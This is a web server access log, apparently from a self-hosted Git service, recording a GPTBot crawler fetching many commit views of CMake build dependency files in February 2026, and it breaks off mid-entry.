"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26858] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26858] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10288] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10289] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10288] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24288] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24290] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24290] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10287] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24288] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24288] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10289] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10287] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11309] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24289] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26860] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26858] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26861] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26856] [Gzip 20.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26858] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26857] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10286] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10291] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:28:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs" [Client 